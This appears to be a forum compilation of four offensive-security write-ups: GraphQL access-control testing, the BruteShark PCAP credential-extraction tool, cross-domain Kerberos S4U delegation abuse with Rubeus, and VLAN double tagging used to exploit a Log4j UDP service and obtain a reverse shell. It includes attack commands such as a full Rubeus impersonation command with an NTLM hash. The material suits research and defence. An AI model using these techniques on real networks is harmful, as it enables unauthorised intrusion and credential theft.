Closing the Loop: Practical Attacks and Defences for GraphQL APIs Eugene Lim Follow May 6 · 9 min read Introduction GraphQL is a modern query language for Application Programming Interfaces (APIs). Supported by Facebook and the GraphQL Foundation, GraphQL grew quickly and has entered the early majority phase of the technology adoption cycle, with major industry players like Shopify, GitHub and Amazon coming on board. Innovation Adoption Lifecycle from Wikipedia As with the rise of any new technology, using GraphQL came with growing pains, especially for developers who were implementing GraphQL for the first time. While GraphQL promised greater flexibility and power over traditional REST APIs, GraphQL could potentially increase the attack surface for access control vulnerabilities. Developers should look out for these issues when implementing GraphQL APIs and rely on secure defaults in production. At the same time, security researchers should pay attention to these weak spots when testing GraphQL APIs for vulnerabilities. With a REST API, clients make HTTP requests to individual endpoints. For example: GET /api/user/1: Get user 1 POST /api/user: Create a user PUT /api/user/1: Edit user 1 DELETE /api/user/1: Delete user 1 GraphQL replaces the standard REST API paradigm. Instead, GraphQL specifies only one endpoint to which clients send either query or mutation request types. These perform read and write operations respectively. A third request type, subscriptions, was introduced later but has been used far less often. On the backend, developers define a GraphQL schema that includes object types and fields to represent different resources. For example, a user would be defined as: type User { id: ID! name: String! email: String! height(unit: LengthUnit = METER): Float friends: [User!]! status: Status! } enum LengthUnit { METER FOOT } enum Status { FREE PREMIUM } This simple example demonstrates several powerful features of GraphQL. It supports a list of other object types (friends), variables (unit), and enums (status). In addition, developers write resolvers, which define how the backend fetches results from the database for a GraphQL request. To illustrate this, let’s assume that a developer has defined the following query in the schema: { “name”: “getUser”, “description”: null, “args”: [ { “name”: “id”, “description”: null, “type”: { “kind”: “SCALAR”, “name”: “ID”, “ofType”: null }, “defaultValue”: null } ], “type”: { “kind”: “OBJECT”, “name”: “User”, “ofType”: null }, “isDeprecated”: false, “deprecationReason”: null } On the client side, a user would make the getUser query and retrieve the name and email fields through the following POST request: POST /graphql Host: example.com Content-Type: application/json {“query”:”query getUser($id:ID!) { getUser(id:$id) { name email }}”,”variables”:{“id”:1},”operationName”:”getUser”} On the backend, the GraphQL layer would parse the request and pass it to the matching resolver: Query: { user(obj, args, context, info) { return context.db.loadUserByID(args.id).then( userData => new User(userData) ) } } Here, args refers to the arguments provided to the field in the GraphQL query. In this case, args.id is 1. Finally, the requested data would be returned to the client: { “data”: { “user”: { “name”: “John Doe”, “email”: “johndoe@example.com” } } } You may have noticed that the User object type also includes the friends field, which references other User objects. Clients can use this to query other fields on related User objects. POST /graphql Host: example.com Content-Type: application/json {“query”:”query getUser($id:ID!) { getUser(id:$id) { name email friends { email }}}”,”variables”:{“id”:1},”operationName”:”getUser”} Thus, instead of manually defining individual API endpoints and controller functions, developers can leverage the flexibility of GraphQL to craft complex queries on the client side without having to modify the backend. This makes GraphQL popular with serverless implementations like Apollo Server with AWS Lambda. Trouble in Paradise Remember the familiar line — with great power comes great responsibility? While GraphQL’s flexibility is a strong advantage, it can be abused to exploit access control and information disclosure vulnerabilities. Consider the simple User object type and query. You might reasonably expect that a user can query the email of their friends. But what about the email of their friends’ friends? Without seeking authorisation, an attacker could easily obtain the emails of second-degree and third-degree connections using the following: query Users($id: ID!) { user(id: $id) { name friends { friends { email friends { email } } } } } In the classic REST paradigm, developers implement access controls for each individual controller or model hook. While potentially violating the Don’t Repeat Yourself (DRY) principle, this gives developers greater control over each call’s access controls. GraphQL advises developers to delegate authorisation to the business logic layer rather than the GraphQL layer. Business Logic Layer from GraphQL As such, the authorisation logic sits below the GraphQL resolver. For instance, in this sample from GraphQL: //Authorization logic lives inside postRepository var postRepository = require(‘postRepository’); var postType = new GraphQLObjectType({ name: ‘Post’, fields: { body: { type: GraphQLString, resolve: (post, args, context, { rootValue }) => { return postRepository.getBody(context.user, post); } } } }); postRepository.getBody validates access controls in the business logic layer. However, this isn’t enforced by the GraphQL specification. GraphQL recognises that it may be “tempting” for developers to place the authorisation logic incorrectly in the GraphQL layer. Unfortunately, developers fall into this trap far too often, creating holes in the access control layer. Thinking in Graphs So how should security researchers approach a GraphQL API? GraphQL recommends that developers “think in graphs” when modelling their data, and researchers should do the same. We can draw parallels to what I call “second-order Insecure Direct Object References (IDORs)” in the classic REST paradigm. For example, in a REST API, while the following API call may be properly protected: GET /api/user/1 A “second-order” API call may not be adequately protected: GET /api/user/1/photo/6 The backend logic may have validated that the user requesting for user number 1 has read permissions to that user. However it has failed to check if they should also have access to photo number 6. The same applies to GraphQL calls, except that with a graph schema, the number of possible paths increases exponentially. Take a social media photo for example: What if an attacker queries the users who have liked a photo, and in turn accesses their photos? query Users($id: ID!) { user(id: $id) { name photos { image likes { user { photos { image } } } } } } What about the likes on those photos? The chain continues. In short, a security researcher should seek to “close the loop” in the graph and find paths towards their target object. Dominic Couture from GitLab explains this comprehensively in his post about his graphql-path-enum tool. Let’s Get Down to Business In most implementations of GraphQL APIs, you should be able to quickly identify the GraphQL endpoint because they tend to be simply /graphql or /graph. You can also identify them based on the requests made to these endpoints. POST /graphql Host: example.com Content-Type: application/json {“query”: “query AllUsers { allUsers{ id } }”} You should look out for key words like query and mutation. In addition, some GraphQL implementations use GET requests that look like this: GET /graphql?query=…. Once you’ve identified the endpoint, you should extract the GraphQL schema. Thankfully, the GraphQL specification supports such “introspection” queries that return the entire schema. This allows developers to quickly build and debug GraphQL queries. These introspection queries perform a similar function as the API call documentation tools, such as Swagger, in REST APIs. We can adapt the introspection query from this gist: query IntrospectionQuery { __schema { queryType { name } mutationType { name } subscriptionType { name } types { …FullType } directives { name description args { …InputValue } locations } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { …InputValue } type { …TypeRef } isDeprecated deprecationReason } inputFields { …InputValue } interfaces { …TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { …TypeRef } } fragment InputValue on __InputValue { name description type { …TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name } } } } Of course, you will have to encode this for the method that the call is made with. To match the standard POST /graphql JSON format, use: POST /graphql Host: example.com Content-Type: application/json {“query”: “query IntrospectionQuery {__schema {queryType { name },mutationType { name },subscriptionType { name },types {…FullType},directives {name,description,args {…InputValue},locations}}}\nfragment FullType on __Type {kind,name,description,fields(includeDeprecated: true) {name,description,args {…InputValue},type {…TypeRef},isDeprecated,deprecationReason},inputFields {…InputValue},interfaces {…TypeRef},enumValues(includeDeprecated: true) {name,description,isDeprecated,deprecationReason},possibleTypes {…TypeRef}}\nfragment InputValue on __InputValue {name,description,type { …TypeRef },defaultValue}\nfragment TypeRef on __Type {kind,name,ofType {kind,name,ofType {kind,name,ofType {kind,name}}}}”} Hopefully, this will return the entire schema so you can begin hunting for different paths to your desired object type. Several GraphQL frameworks, such as Apollo, acknowledge the dangers of exposing introspection queries and have disabled them in production by default. In such cases, you will have to feel your way forward by patiently brute-forcing and enumerating possible object types and fields. For Apollo, the server helpfully returns Error: Unknown type “X”. Did you mean “Y”? for a type or field that’s close to the actual value. Security researchers should uncover as much of the original schema as possible. If you have the full schema, feel free to run it through tools like graphql-path-enum to enumerate different paths from one query to a target object type. In the example given by graphql-path-enum, if the target object type in a schema is Skill, the researcher should run: $ graphql-path-enum -i ./schema.json -t Skill Found 27 ways to reach the “Skill” node from the “Query” node: — Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill — Query (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill — Query (checklist_check_response) -> ChecklistCheckResponse (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill — Query (checklist_checks) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill — Query (clusters) -> Cluster (weaknesses) -> Weakness (critical_reports) -> TeamMemberGroupConnection (edges) -> TeamMemberGroupEdge (node) -> TeamMemberGroup (team_members) -> TeamMember (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill … The results return different paths in the schema to reach Skill objects through nested queries and linked object types. Security researchers should also go through the schema manually to discover paths that graphql-path-enum might have missed. Since the tool also requires a GraphQL schema to work, researchers that are unable to extract the full schema will also have to rely on manual inspection. To do this, consider various object types the attacker has access to, find their linked object types, and follow these links to the protected resource. Next, test these queries for access control issues. For mutations, the approach is similar. Beyond testing for direct access control issues (mutations on objects you should not have access to), you will need to check the return values of mutations for linked object types. Conclusion GraphQL adds greater flexibility and depth to APIs by querying objects through the graph paradigm. However, it is not a panacea for access control vulnerabilities. GraphQL APIs are prone to the same authorisation and authentication issues that affect REST APIs. Additionally, its access controls still depend on developers to define appropriate business logic or model hooks, increasing the potential for human errors. Developers should move their access controls as close to the persistence (model) layer as possible, and when in doubt, rely on frameworks with sane defaults like Apollo. In particular, Apollo recommends performing authorisation checks in data models: Since the very beginning, we’ve recommended moving the actual data fetching and transformation logic from resolvers to centralized Model objects that each represent a concept from your application: User, Post, etc. This allows you to make your resolvers a thin routing layer, and put all of your business logic in one place. For instance, the model for User would look like this: export const generateUserModel = ({ user }) => ({ getAll: () => { if(!user || !user.roles.includes(‘admin’)) return null; return fetch(‘http://myurl.com/users'); }, … }); By moving the authorisation logic to the model layer instead of spreading it across different controllers, developers can define a single “source of truth”. In the long run, as GraphQL enjoys even greater adoption and reaches the late majority stage of the technology adoption cycle, more developers will implement GraphQL for the first time. Developers must carefully consider the attack surface of their GraphQL schemas and implement secure access controls to protect user data. Further Reading Introduction to GraphQL GraphQL path enumeration for better permission testing GraphQL introspection and introspection queries Securing GraphQL The Hard Way: Security Learnings from Real-world GraphQL Special thanks to Dominic Couture, Kenneth Tan, Medha Lim, Serene Chan, and Teck Chung Khor for their inputs. Sursa: https://medium.com/csg-govtech/closing-the-loop-practical-attacks-and-defences-for-graphql-apis-138cb667aaff
-
Brute Shark BruteShark is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files). It includes: password extracting, building a network map, reconstruct TCP sessions, extract hashes of encrypted passwords and even convert them to a Hashcat format in order to perform an offline Brute Force attack. The main goal of the project is to provide solution to security researchers and network administrators with the task of network traffic analysis while they try to identify weaknesses that can be used by a potential attacker to gain access to critical points on the network. Two BruteShark versions are available, A GUI based application (Windows) and a Command Line Interface tool (Windows and Linux). The various projects in the solution can also be used independently as infrastructure for analyzing network traffic on Linux or Windows machines. For further details see the Architecture section. The project was developed in my spare time to address two main passions of mine: software architecture and analyzing network data. Contact me on contact.oded.shimon@gmail.com or create new issue. Please ⭐️ this repository if this project helped you! What it can do Extracting and encoding usernames and passwords (HTTP, FTP, Telnet, IMAP, SMTP...) Extract authentication hashes and crack them using Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) Build visual network diagram (Network nodes & users) Reconstruct all TCP Sessions Download Windows - download Windows Installer (64 Bit). Linux - download BruteSharkCli.zip and run BruteSharkCli.exe using MONO: wget https://github.com/odedshimon/BruteShark/releases/latest/download/BruteSharkCli.zip unzip BruteSharkCli.zip mono BruteSharkCli/BruteSharkCli.exe Examples Videos How do i crack (by mistake!) Windows 10 user NTLM password Run Brute Shark CLI on Ubuntu with Mono Hashes Extracting Building a Network Diagram Password Extracting Reconstruct all TCP Sessions Brute Shark CLI Architecture The solution is designed with three layer architecture, including a one or more projects at each layer - DAL, BLL and PL. The separation between layers is created by the fact that each project refers only its own objects. PcapProcessor (DAL) As the Data Access Layer, this project is responsible for reading raw PCAP files using appropriate drivers (WinPcap, libpcap) and their wrapper library SharpPcap. Can analyze a list of files at once, and provides additional features like reconstruction of all TCP Sessions (using the awesome project TcpRecon). PcapAnalyzer (BLL) The Business Logic Layer, responsible for analyzing network information (packet, TCP Session etc.), implements a pluggable mechanism. Each plugin is basically a class that implements the interface IModule. All plugins are loaded using reflection: private void _initilyzeModulesList() { // Create an instance for any available modules by looking for every class that // implements IModule. this._modules = AppDomain.CurrentDomain.GetAssemblies() .SelectMany(s => s.GetTypes()) .Where(p => typeof(IModule).IsAssignableFrom(p) && !p.IsInterface) .Select(t => (IModule)Activator.CreateInstance(t)) .ToList(); // Register to each module event. foreach(var m in _modules) { m.ParsedItemDetected += (s, e) => this.ParsedItemDetected(s, e); } } BruteSharkDesktop (PL) Desktop application for Windows based on WinForms. Uses a cross-cutting project by the meaning it referrers both the DAL and BLL layers. This is done by composing each of the layers, register to their events, when event is triggered, cast the event object to the next layer equivalent object, and send it to next layer. public MainForm() { InitializeComponent(); _files = new HashSet<string>(); // Create the DAL and BLL objects. _processor = new PcapProcessor.Processor(); _analyzer = new PcapAnalyzer.Analyzer(); _processor.BuildTcpSessions = true; // Create the user controls. _networkMapUserControl = new NetworkMapUserControl(); _networkMapUserControl.Dock = DockStyle.Fill; _sessionsExplorerUserControl = new SessionsExplorerUserControl(); _sessionsExplorerUserControl.Dock = DockStyle.Fill; _hashesUserControl = new HashesUserControl(); _hashesUserControl.Dock = DockStyle.Fill; _passwordsUserControl = new GenericTableUserControl(); _passwordsUserControl.Dock = DockStyle.Fill; // Contract the events. _processor.TcpPacketArived += (s, e) => _analyzer.Analyze(Casting.CastProcessorTcpPacketToAnalyzerTcpPacket(e.Packet)); _processor.TcpSessionArived += (s, e) => _analyzer.Analyze(Casting.CastProcessorTcpSessionToAnalyzerTcpSession(e.TcpSession)); _processor.FileProcessingStarted += (s, e) => SwitchToMainThreadContext(() => OnFileProcessStart(s, e)); _processor.FileProcessingEnded += (s, e) => SwitchToMainThreadContext(() => OnFileProcessEnd(s, e)); _processor.ProcessingPrecentsChanged += (s, e) => SwitchToMainThreadContext(() => OnProcessingPrecentsChanged(s, e)); _analyzer.ParsedItemDetected += (s, e) => SwitchToMainThreadContext(() => OnParsedItemDetected(s, e)); _processor.TcpSessionArived += (s, e) => SwitchToMainThreadContext(() => OnSessionArived(Casting.CastProcessorTcpSessionToBruteSharkDesktopTcpSession(e.TcpSession))); _processor.ProcessingFinished += (s, e) => SwitchToMainThreadContext(() => OnProcessingFinished(s, e)); InitilizeFilesIconsList(); this.modulesTreeView.ExpandAll(); } BruteSharkCLI (PL) Command Line Interface version of Brute Shark. Cross platform Windows and Linux (with Mono). Available commands: (1). help (2). add-file (3). start (4). show-passwords (5). show-hashes (6). export-hashes (7). exit Sursa: https://github.com/odedshimon/BruteShark
-
Crossing Trusts 4 Delegation Posted on Sat 04 April 2020 in Active Directory The purpose of this post is to attempt to explain some research I did not long ago on performing S4U across a domain trust. There doesn't seem to be much research in this area and very little information about the process of requesting the necessary tickets. I highly recommend reading Elad Shamir's Wagging the Dog post before reading this, as here I'll primarily focus on the differences between performing S4U within a single domain and performing it across a domain trust but I won't be going into a huge amount of depth on the basics of S4U and it's potential for attack, as Elad has already done that so well. Motivation I first thought of the ability to perform cross domain S4U when looking at the following Microsoft advisory. It states: “To re-enable delegation across trusts and return to the original unsafe configuration until constrained or resource-based delegation can be enabled, set the EnableTGTDelegation flag to Yes.” This makes it clear that it is possible to perform cross domain constrained delegation. The problem was I couldn't find anywhere that gave any real detail as to how it is performed, and the tools used to take advantage of constrained delegation did not support it. Luckily Will Schroeder published how to simulate real delegation traffic: # translated from the C# example at https://msdn.microsoft.com/en-us/library/ff649317.aspx # load the necessary assembly $Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') # execute S4U2Self w/ WindowsIdentity to request a forwardable TGS for the specified user $Ident = New-Object System.Security.Principal.WindowsIdentity @('Administrator@TESTLAB.LOCAL') # actually impersonate the next context $Context = $Ident.Impersonate() # implicitly invoke S4U2Proxy with the specified action ls \\PRIMARY.TESTLAB.LOCAL\C$ # undo the impersonation context $Context.Undo() This allowed me to figure out how it works and implement it into Rubeus. Recap To perform standard constrained delegation, 3 requests and responses are required: 1. AS-REQ and AS-REP, which is just the standard Kerberos authentication. 2. S4U2Self TGS-REQ and TGS-REP, which is the first step in the S4U process. 3. S4U2Proxy TGS-REQ and TGS-REP, which is the actual impersonation to the target service. I created a visual representation as the ones I've seen previously weren't the easiest to understand: In this it's the ticket contained within the final TGS_REP that is used to access the target service as the impersonated user. Some Theory After hours of using Will's Powershell to generate S4U traffic and staring at packet dumps, this is how I understood cross domain S4U to work: Clearly there's a lot more going on here, so let me try to explain. The first step is still the same, a standard Kerberos authentication with the local domain controller. (1 and 2) A service ticket is requested for the foreign domains krbtgt service from the local domain controller. (3 and 4) The users real TGT is required for this request. This is known as the inter-realm TGT or cross domain TGT. This resulting service ticket is used to request service tickets for services on the foreign domain from the foreign domain controller. Here's where things start to get a little complicated. And the S4U2Self starts. A service ticket for yourself as the target user you want to impersonate is requested from the foreign domain controller. (5 and 6) This requires the cross domain TGT. This is the first step in the cross domain S4U2Self process. A service ticket for yourself as the user you want to impersonate is now requested from the local domain controller. (7 and ? This request includes the users normal TGT as well as having the S4U2Self ticket, received from the foreign domain in step 3, attached as an additional ticket. This is the final step in the cross domain S4U2Self process. And finally the S4U2Proxy requests. As with S4U2Self, it involves 2 requests, 1 to the local DC and 1 to the foreign DC. A service ticket for the target service (on the foreign domain) is requested from the local domain controller. (9 and 10) This requires the users real TGT as well as the S4U2Self ticket, received from the local domain controller in step 4, attached as an additional ticket. This is the first step in the cross domain S4U2Proxy process. A service ticket for the target service is requested from the foreign domain controller. (11 and 12) This requires the cross domain TGT as well as the S4U2Proxy ticket, received from the local domain controller in step 5, as an additional ticket. This is the service ticket used to access the target service and the final step in the cross domain S4U2Proxy process. I implemented this full process into Rubeus with this PR, which means that the whole process can be carried out with a single command. The implementation primarily involves the CrossDomainS4U(), CrossDomainKRBTGT(), CrossDomainS4U2Self() and CrossDomainS4U2Proxy() functions, along with the addition of 2 new command line switches, /targetdomain and /targetdc, and some other little modifications. Basically when /targetdomain and /targetdc are passed on the commandline, Rubeus executes a cross domain S4U, otherwise a standard one is performed. What's The Point? Good question. This could be a useful attack path in some unusual situations. Let me try to explain one. Consider the following infrastructure setup: There are 2 domains, in a single forest. internal.zeroday.lab (the parent and root of the forest) and child1.internal.zeroday.lab (a child domain). We've compromised a standard user, child.user, on child1.internal.zeroday.lab, this user can also authenticate against the SQL server ISQL1 in internal.zeroday.lab as a low privileged user: As Elad mentions in the MSSQL section of his blog post, if the SQL server has the WebDAV client installed and running, xp_dirtree can be used to coerce an authentication to port 80. What is important here is that the machine account quota for internal.zeroday.lab is 0: This means that the standard method of creating a new machine account using the relayed credentials will not work: The machine account quota for child1.internal.zeroday.lab is still the default 10 though: So the user child.user can be used to create a machine account within the child1.internal.zeroday.lab domain: As the machine account belongs to another domain, ntlmrelayx.py is not able to resolve the name to a SID: For this reason I made a small modification which allows you to manually specify the SID, rather than a name. First we need the SID of the newly created machine account: Now the --sid switch can be used to specify the SID of the machine account to delegate access to: The configuration can be verified using Get-ADComputer: Impersonation So now everything is in place to perform the S4U and impersonate users to access ISQL1. The NTLM hash of the newly created machine account is the ast thing that is required: The following command can be used to perform the full attack and inject the service ticket for immediate use: .\Rubeus.exe s4u /user:TestChildSPN$ /rc4:C4B0E1B10C7CE2C4723B4E2407EF81A2 /domain:child1.internal.zeroday.lab /dc:IC1DC1.child1.internal.zeroday.lab /impersonateuser:internal.admin /targetdomain:internal.zeroday.lab /targetdc:IDC1.internal.zeroday.lab /msdsspn:http/ISQL1.internal.zeroday.lab /ptt This command does a number of things but simply put, it authenticates as TestChildSPN$ from child1.internal.zeroday.lab against IC1DC1.child1.internal.zeroday.lab and impersonates internal.admin from internal.zeroday.lab to access http/ISQL1.internal.zeroday.lab. Now let's look at this in a bit more detail. As described previously, the first step is to perform a standard Kerberos authentication and recieve the account's TGT that has been delegated access (TestChildSPN in this case): This TGT is then used to request the cross domain TGT from IC1DC1.child1.internal.zeroday.lab (the local domain controller): This is simply a service ticket to krbtgt/internal.zeroday.lab. This cross domain TGT is then used on the foreign domain in exactly the same manner the users real TGT is used on the local domain. It is this ticket that is then used to request the S4U2Self service ticket for TestChildSPN$ for the user internal.admin from IDC1.internal.zeroday.lab (the foreign domain controller): To complete the S4U2Self process, the S4U2Self service ticket is requested from IC1DC1.child1.internal.zeroday.lab, again for TestChildSPN$ for the user internal.admin, but this time the users real TGT is used and the S4U2Self service ticket retrieved from the foreign domain in the previous step is attached as an additional ticket within the TGS-REQ: To begin the impersonation, a S4U2Proxy service ticket is requested for the target service (http/ISQL1.internal.zeroday.lab in this case) from IC1DC1.child1.internal.zeroday.lab. As this request is to the local domain controller the users real TGT is used and the local S4U2Self, received in the previous step, is atached as an additional ticket in the TGS-REQ: Lastly, a S4U2Proxy service ticket is also requested for http/ISQL1.internal.zeroday.lab from IDC1.internal.zeroday.lab. As this request is to the foreign domain controller, the cross domain TGT is used, and the local S4U2Proxy service ticket received in the previous step is attached as an additional ticket in the TGS-REQ. Once the final ticket is received, Rubeus automatically imports the ticket so it can be used immediately: Now that the final service ticket has been imported it's possible to get code execution on the target server: Conclusion While it was possible to perform this across trusts within a single forest, I didn't manage to get this to work across external trusts. It would probably be possible but would require a non-standard trust configuration. With most configurations this wouldn't be required as you could either create a machine account within the target domain or delegate to the same machine account, as I've discussed in a previous post, but it's important to understand the limits of what is possible with these types of attacks. The mitigations are exactly the same as Elad discusses in his blog post as the attack is exactly the same, the only difference is here I'm performing it across a domain trust. Acknowledgements A big thaks to Will Schroeder for all of his work on delegation attacks and Rubeus. Also Elad Shamir for his detailed work on resource-based constrained delegation attacks and contributions to Rubeus which helped me greatly when trying to implement this. Benjamin Delpy for all of his work on Kerberos tickets in mimikatz and kekeo. I'm sure there are many more too, without these guys work, research in this area would be much further behind where it currently is! Sursa: https://exploit.ph/crossing-trusts-4-delegation.html
-
Exploiting VLAN Double Tagging April 17, 2020 We have all heard about VLAN double tagging attacks for a long time now. There have been many references and even a single packet proof of concept for VLAN double tagging attack but none of them showcase a weaponized attack. In this blog Amish Patadiya will use VLAN double tagging technique to reach a VLAN and exploit a vulnerability on a server which resides on another VLAN using native Linux tools creatively and demonstrate an actual exploitation using VLAN double tagging. But first the basics. What is VLAN? Before diving into the concept of VLAN (Virtual Local Area Network) Tagging, it is important to understand the need for VLANs. When we create a network, there will be numerous hosts communicating with each other within that network. VLANs allow flexibility of network placement by allowing multiple network configurations on each switch allowing end point devices to be segregated from each other even though they might be connected on the same physical switch. For larger networks, VLAN segregation also helps in breaking broadcast domains to smaller groups. Broadcast domain can be considered as a network where all nodes communicate over a data link layer. In a VLAN network, all packets are assigned with a VLAN id. By default all the switch ports are considered members of native VLAN unless a different VLAN is assigned. VLAN-1 is a Native VLAN by default and the network packets of native VLAN will not have a tag on them. Hence, such traffic will be transmitted untagged in the VLAN network. For example, if we try to communicate to a host on VLAN network, the network packet will have VLAN tag (ID: 20 is the tag in this case) as shown in Figure: What is VLAN Double Tagging? Before understanding the exploitation, let’s have a quick overview of VLAN double tagging. The figure below shows a network diagram which is kind-of self-explanatory: Note that the attacker is in VLAN-1, a native VLAN which will be required for the double tagging attack, and the victim server is in VLAN-20. Server has a local IP address “10.0.20.11” which is not accessible from attacker’s machine “kali-internal” on VLAN-1 as shown in Figure below: Attacker’s machine has two interfaces and “eth2” is connected on the VLAN-1 network. Figure below shows the network configuration of interface “eth2”: When it comes to VLAN exploitation Yersinia is the tool of choice. Yersinia provides a Proof of Concept (PoC) using ICMP packet. We have replicated a PoC using Yersinia for sending ICMP packets, and is shown in below Figure: Let’s confirm VLAN double tagging on each link on the network. The Figure provided below shows traffic captured on link “1” which connects VLAN-1 network and router “R1”. The figure shows the ICMP packet for address “10.0.20.11” with dual 802.1Q VLAN tags: Figure below shows the traffic captured on link “Trunk” which connects router “R1” and router “R2”. When VLAN traffic passes through the Trunk, all native VLAN packets are transmitted without tags i.e. untagged, hence this attack can only be performed from native VLAN network. Here in this case, the VLAN-1 tag got removed and the packet only had the VLAN-20 tag. Now, the traffic is on VLAN-20 network and therefore the VLAN-20 tag was removed by router “R2” as shown in Figure below which also shows traffic captured on link “2” connecting router “R2” and victim server: Lets try to replicate the same attack using native Linux tools. Double Tagging Using Native Tools We will leverage vconfig utility available in all Linux machines. Using this utility we could create an interface which allowed us to send double tagged packets to the network. We have written a script detailing each step as shown in figure below to help configure your network to double tag real-time traffic of your machine: Here we have used 802.1Q kernel modules to allow tagged packet transmission. The virtual interface “eth2.1” is created using vconfig which automatically tags packets with VLAN id 1. Another interface “eth2.1.20”,which tags packets with VLAN id 20, is created on “eth2.1” resulting in double tagging of the outgoing packet. On executing this script you get following output: To test our configuration for double tagging on real time traffic. Let’s ping the victim server “10.0.20.11” as shown in below Figure: We can see the traffic captured on link “1”, which has ICMP packets sent to victim server getting double tagged: The traffic captured on link “2” confirms that the packets also reached the victim server: This confirms our ability to transmit actual traffic to another VLAN. Now let’s try to weaponize the attack. Weaponizing double tagging To weaponize this we started with TCP traffic and immediately hit a roadblock, this made us revisit our fundamentals. Taking a stepwise approach to understand the problem, we started a server on the victim machine as shown in Figure: On the attacker machine we ran a simple “wget” to access content of the web server hosted on the victim server as shown below: It can be seen that wget could not find the web server. This is not because of the double tagging misconfiguration. It is because “HTTP” uses TCP protocol and TCP requires a 3-way Handshake to initiate connection. While requesting a wget it will first attempt to establish a full TCP 3-way handshake before the actual communication. Figure below shows the traffic, captured on link “2”, which shows the “SYN” packet sent from attacker machine to victim server: As the victim is a member of VLAN-20, the response packet from the victim will have a tag VLAN-20. Since the attacker is a part of VLAN-1, a different VLAN, the attacker will not receive any response from the victim. VLAN double tagging attack is a one-way communication, the attacker machine will not receive any “SYN-ACK” packet to complete a 3-way handshake as shown in Figure: To demonstrate, we tried to communicate with the victim on TCP port 8080 and the network status on the attacker’s machine is “SYN_SENT” as shown in Figure: On the victim’s machine, the network status for this request packet is “SYN_RCV” as shown in Figure: Meaning the “SYN-ACK” sent by the victim never reached the attacker on another VLAN. This supports the conclusion for now that we cannot attack a TCP service on another VLAN. What about UDP services? There are multiple services running on UDP ports , and UDP ports most of the time go unnoticed in engagements. As UDP is a connectionless protocol it does not require any handshake. It sends the data directly so we can send packets to any UDP service on another VLAN. To demonstrate the attack we used a “Log4j” server having vulnerability CVE-2017-5645 in UDP mode. Figure below shows that “Log4j” service is listening on UDP port “12345” on the victim server: To verify the success of our attack, we will try to create a file with the name “success” at location “/tmp/” on the victim server. Figure below lists current contents of “/tmp/” on the server: “Log4j” service accepts logs in serialized format, we make use of Ysoserial tool to generate a serialized payload and run the payload to execute the attack on the victim server on the mentioned port as shown below. On analysing the traffic on Wireshark we confirmed that the UDP payload reached VLAN-20 network: The payload reached the victim server and created a file named “success” at location “/tmp/” as shown in below Figure: Now, let’s take a shell, However we are again stuck with one way communication limitation. We can overcome this limitation by leveraging a publicly hosted server (let’s say kali-Internet). We started a listener on server “kali-Internet” on port “32323” over the internet as shown in Figure: We create a serialized payload using ysoserial which sends the shell to “kali-Internet”. After payload is executed on the victim server, we get the shell over the internet. Doing a quick cat on “/etc/hostname” of the server it reads “Victim__[eth0:_10.0.20.11/24]”, which is our victim server, as shown in below Figure: And this is how we can use the VLAN double tagging technique for actual exploitation of UDP services. TCP attack revisited Once we were able to exploit UDP service we wanted to revisit TCP and see if anything could be done, so we ran some tests. The section below is purely an adventure into wonderland and we are making assumptions to see if anything could be done. The first major hurdle in our path was that the 3-way handshake couldn’t be completed. Let’s delve deep into the handshake and understand the bottleneck. We setup the following: Start a listener on victim machine Start traffic capture at victim machine Sent a wget request from attacker machine We can see in traffic capture that the SYN packet is received and a SYN-ACK packet is sent from victim machine with “Seq=2678105924” and “Ack=2082233419”, however, as described already this doesn’t reach the attacker. We can validate this by looking at the netstat output on the attacker machine, the connection is in SYN_SENT status. This got us thinking what if we emulate the SYN ACK, would the server then send a full request to the victim. So we tested this using a utility called Hping3: This indeed resulted in a connection being established, as can be seen below: Now as the connection is established per attacker, the attacker goes ahead and sends an HTTP request, This is duly received and captured at the victim end. This shows that, if we can grab valid “Seq” and “Ack” values, a successful TCP connection could be established and an attack on TCP service could be possible. However this attack would have been super easy if the RFC 6528 was not in existence (https://www.rfc-archive.org/getrfc.php?rfc=6528). This RFC implements TCP sequence and Ack numbers randomized at protocol level itself. However we wanted to put this out in open so that if anyone wants to go down this path they have some details of what people have attempted so far. Limitations Following prerequisites are needed to perform VLAN double tagging attack: Attacker must be on native VLAN network. Attacker should have following information about the victim server: VLAN information of server. Vulnerable UDP service and port. Remediation Never use native VLAN for any network. By default VLAN-1 is native VLAN. If deemed necessary change the native VLAN from VLAN id 1 While configuring a VLAN network configure endpoint interfaces clearly as access ports. Always specify allowed VLAN ids per trunk, never allow all VLAN traffic to pass through any trunk port. References https://cybersecurity.att.com/blogs/security-essentials/vlan-hopping-and-mitigation https://packetlife.net/blog/2010/feb/22/experimenting-vlan-hopping/ https://tools.kali.org/vulnerability-analysis/yersinia https://serverfault.com/questions/506488/linux-how-can-i-configure-dot1addouble-tag-on-a-interface https://www.rfc-archive.org/getrfc.php?rfc=6528 Sursa: https://www.notsosecure.com/exploiting-vlan-double-tagging/
- 1 reply
-
- 2
-
-
